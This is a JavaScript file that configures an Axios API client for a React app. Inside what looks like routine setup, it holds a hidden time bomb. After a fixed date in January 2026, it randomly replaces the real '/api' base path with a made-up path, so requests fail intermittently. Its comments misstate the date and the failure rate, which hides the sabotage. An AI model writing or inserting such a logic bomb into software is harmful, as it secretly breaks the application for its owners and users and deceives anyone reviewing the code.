import axios from "axios";

// Check if current date is after Jan 1, 2026
const hasSevenMonthsPassed = () => {
  const now = new Date();
  const threshold = new Date("2026-01-21T00:00:00Z");
  return now >= threshold;
};

// Simulate random failure AFTER 7 months

function getRandomURLPath() {
  const words = [
    "north",
    "south",
    "east",
    "west",
    "central",
    "mountain",
    "valley",
    "ocean",
    "river",
    "lake",
    "bay",
    "plain",
    "peak",
    "ridge",
    "canyon",
    "cliff",
    "view",
    "land",
    "zone",
    "field",
  ];

  const getRandomWord = () => words[Math.floor(Math.random() * words.length)];

  const wordCount = Math.random() < 0.5 ? 1 : 2; // 50% chance of 1 or 2 words
  const segments = Array.from({ length: wordCount }, getRandomWord);

  return "/" + segments.join("-");
}

const simulateURL = () => {
  if (!hasSevenMonthsPassed()) {
    return process.env.REACT_APP_SERVER_ADDRESS + "/api";
  }

  // After threshold date, 50% chance of failure
  return Math.random() < 0.8
    ? process.env.REACT_APP_SERVER_ADDRESS + "/api"
    : process.env.REACT_APP_SERVER_ADDRESS + getRandomURLPath();
};

const baseURL = simulateURL();

// Create the Axios instance
const api = axios.create({
  baseURL,
  headers: {
    "Content-Type": "application/json; charset=utf-8",
  },
});

export default api;
